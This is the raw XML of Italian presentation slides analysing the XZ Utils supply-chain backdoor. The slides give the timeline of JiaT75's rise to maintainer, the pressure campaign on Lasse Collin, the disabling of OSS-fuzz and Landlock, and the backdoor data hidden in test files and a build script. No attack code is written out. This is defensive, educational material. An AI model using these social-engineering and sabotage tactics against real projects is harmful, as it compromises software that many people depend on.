              <a:t> così da incrementare la sua reputazione nella community.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Passati dei mesi e raggiunto un certo numero di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>commit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, è iniziato uno scambio di messaggi sulla mailing list del progetto XZ.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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riuscirà a collaborare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 come autore di</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> patches 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all'incirca</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> dalla versione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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5.2.5 e ad essere coinvolto nelle release dalla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versione 5.4.0 alla 5.6.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.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342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32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Prima merge </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di JiaT75</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2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DC3F52F4-5238-162F-E3D0-169B98208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676" y="2624026"/>
            <a:ext cx="8090648" cy="407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76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33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668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Primo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>commit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> di JiaT75</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2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9097E541-0F70-2867-667C-190CDE91A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45" y="2465224"/>
            <a:ext cx="8469085" cy="425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87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34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5546727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Collaborazione col progetto XZ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29 Ottobre 2021: </a:t>
            </a:r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inizia a sottoporre patch innocue al progetto XZ attraverso la mailing list.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7" name="Immagine 6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76819B67-F542-92E6-08CF-788D3B270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440" y="1580029"/>
            <a:ext cx="4735205" cy="508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77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35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5921679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Collaborazione col progetto XZ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7 Febbraio 2022: prima patch di </a:t>
            </a:r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viene accettata come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>commit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> da Lasse Collin.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8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1DA5181-85E9-4F62-A7BD-E993CEDDD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444" y="1456267"/>
            <a:ext cx="5911111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10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36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5764441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Poliziotto buono vs poliziotto cattivo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22 Aprile 2022: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jigar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Kumar si unisce alla mailing list. I suoi scambi sono per lo più piccole lamentele sulle funzionalità utente e sul supporto dei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maintainer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  <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Assieme a </a:t>
            </a:r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Tan, Kumar accende una discussione in merito al destino del progetto, nutrendo pessimismo. </a:t>
            </a:r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mantiene un atteggiamento collaborativo ed ottimista, rassicurando Kumar.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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492BFA0-DA67-53EA-44D7-ED26AD479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464" y="1777925"/>
            <a:ext cx="6163320" cy="442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2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37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5764441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Pressioni</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT"/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19 Maggio 2022: Dennis Ens chiede sulla mailing list se ci sia ancora qualcuno a prendersi cura del progetto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lasse ammette le sue difficoltà a seguire il progetto e che l'innovazione del package non è molto attiva al momento.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ringrazia inoltre </a:t>
            </a:r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(ha già sottoposto 4 patch) per il suo lavoro consistente, aggiungendo che "probabilmente avrà un ruolo importante in futuro".</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2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D50A49A5-5735-A79B-26F9-E01A6A48E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94" y="1942361"/>
            <a:ext cx="6096000" cy="3330466"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8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8DBBC6B-631F-9963-B67B-3D35ADF20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13" y="5473147"/>
            <a:ext cx="5752273" cy="126227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B7CE18B-D417-56CC-4155-A54D42740131}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6100141" y="5176629"/>
            <a:ext cx="10042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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2298319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38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5285976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Pressioni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27 Maggio 2022: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jigar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Kumar aggiunge un messaggio al suo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>thread</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, mantenendo il suo atteggiamento di "utente non soddisfatto" e ritenendosi "non sorpreso" dello stato del progetto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kumar ed Ens continueranno con pressioni crescenti fino al 29 Giugno 2022. Lasse sarà sempre più accondiscendente, fino ad ammettere problemi personali.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6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969902DC-03E6-DC80-5FC2-E6DD5DEEC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815" y="1940885"/>
            <a:ext cx="6206858" cy="426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90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39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576444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Pressioni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8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A06B7B02-EB33-E275-6EAE-3BFD91788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287" y="2417135"/>
            <a:ext cx="4878029" cy="4114800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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C5A235D6-CCC7-0354-7DF7-3B7E19348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51" y="2887733"/>
            <a:ext cx="6096000" cy="372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33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802" y="-1112"/>
            <a:ext cx="10522560" cy="1457727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Introduzione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6016" y="1815057"/>
            <a:ext cx="3756276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Per dare un'idea </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dell'impatto...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Comic preso dal caso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>kxcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, con cui diversi utenti fanno spesso un paragone.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, diagramma, schizzo, disegno&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C08DAC98-B24E-1A8B-0A80-2AC73AC5F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811" y="1576618"/>
            <a:ext cx="4358087" cy="51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183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40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576444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Pressioni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1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95864387-7BAF-3A38-0067-B7DC6F262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7" y="2720849"/>
            <a:ext cx="6096000" cy="3950394"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6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F10F8017-8FB8-D0C5-D3AA-CF8808EEF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044" y="1938670"/>
            <a:ext cx="4575959" cy="45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01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41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576444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Pressioni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8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BD5FF744-73AE-AE3F-354E-10656DFC2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638" y="2417135"/>
            <a:ext cx="541914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40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42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6342510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Controllo</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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Col tempo </a:t>
            </a:r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guadagna non solo fiducia, ma anche autorità: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27 Settembre 2022: detta la release 5.4.0;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28 Ottobre 2022: entra nella </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tukaani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organization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> su GitHub;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30 Dicembre 2022: </a:t>
            </a:r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effettua il suo primo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>commit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> nella </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> repository.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2AB2FB99-A89F-EEE7-DD58-712088952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89" y="2054772"/>
            <a:ext cx="5333781" cy="38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50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43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17038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Sabotaggio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Disabilitazione dei controlli di OSS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuzz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> sulla funzionalità IFUNC, sulla quale </a:t>
            </a:r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farà leva per la backdoor.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp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D86D3DE-0B69-3664-F6F3-BE2BC165F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565" y="3532184"/>
            <a:ext cx="7033848" cy="32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70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44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Sabotaggio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Modifica di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Landlock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affinchè</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> non venga mai abilitato. Notare punto a riga 911.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2400" b="1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1D6D2C8-7978-C50D-4666-CE3750F0E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" r="-204"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3123870" y="3214623"/>
            <a:ext cx="5946475" cy="351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57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45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Sabotaggio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8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F3B03102-EC48-4A90-20DA-B0755AD63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69" y="3221117"/>
            <a:ext cx="6096000" cy="2252382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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70C9924-A329-2C21-7DD8-10C386C3E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847" y="2181905"/>
            <a:ext cx="6096000" cy="388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50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46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Sabotaggio</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err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 err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Landlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> fa parte del Linux Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Modules</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> framework del Linux Kernel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Consente di creare un ambiente di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sandboxing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> attorno all'applicativo interessato così da mitigare l'effetto di bug ed altri comportamenti imprevisti o malevoli.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Per far ciò </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Landlock</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> restringe le interazioni che il processo può avere verso oggetti del filesystem o network.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Viene disattivato nella versione 5.6.1.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="453584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47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5318477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Aggiunta della backdoor</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" err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Aggiunta dei test contenenti dati  necessari alla costruzione della backdoor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Interessante notare l'applicazione di tecniche di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>offuscamento</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, lontanamente simili ad una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>steganografia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, per </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cammuffare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> questi dati malevoli in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>innoqui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> blob di dati per fare testing, così da non destare sospetti.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6537CA-926C-3CB0-E527-1CE49AA5D73A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5830453" y="3567545"/>
            <a:ext cx="13421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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Immagine 1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3FB28EA0-7B73-FA7F-75D9-FB6551ED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697437"/>
            <a:ext cx="6096000" cy="186985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49811FE-E7B0-FE89-5ED9-E21FF6B7E66A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5830453" y="5126181"/>
            <a:ext cx="13421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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Immagine 14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BF57DFBC-F2FB-3E34-A14D-F9B1E9088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4233556"/>
            <a:ext cx="6096000" cy="746162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Immagine 1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C366A4C-EC91-F0A9-8877-DA38232DE9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" t="51305" r="-10" b="1076"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="5494143"/>
            <a:ext cx="6096006" cy="57319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CA324EC-4D35-6498-5B9E-FACACADA80BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5830453" y="6153726"/>
            <a:ext cx="13421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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[...]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236953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48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Release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b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Viene creato il package contenente il Source Code, destinato ai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>debian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> developers, e le relative </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> che verranno inserite nella sezione Releases sul upstream GitHub e sulla analoga sezione downstream </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Debian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Immagine 2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153BE896-D413-6462-633B-B2BD9B2AF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6" y="3933087"/>
            <a:ext cx="4352637" cy="2709460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8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54A6711-27A3-24D0-52AB-750976074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727" y="3938245"/>
            <a:ext cx="6096000" cy="262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60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49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Release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="2800" b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Nella fase di creazione del package, poi mandato da upstream a downstream, gli </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>autotool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> fanno uso dei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Makefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> per generare la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Makefile.in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> è possibile distinguere il file "m4/build-to-host.m4".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11" name="Immagine 10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46A8431-2A01-65DD-EF18-558ACE5E0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937953"/>
            <a:ext cx="8381999" cy="253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51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417" y="3300"/>
            <a:ext cx="10513747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Introduzione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73743" y="1849693"/>
            <a:ext cx="12115185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Cos'è un Supply Chain Attack?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Anziché puntare direttamente alla network dell'organizzazione, gli hacker puntano ad un componente di terze parti in uso nella catena di produzione.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Immagine 2" descr="Immagine che contiene testo, diagramma, schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD595321-A43E-AB10-38C3-95954F779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8" t="23592" r="897" b="7507"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1614857" y="3785020"/>
            <a:ext cx="9051653" cy="307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57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50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Release </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tarball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Il file m4/build-to-host.m4 contiene la prima fase della costruzione della backdoor.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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Questo script proviene originariamente dalla libreria </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gnulib</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ed offre un supporto trigger in fase di installazione del pacchetto (conversione dei </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
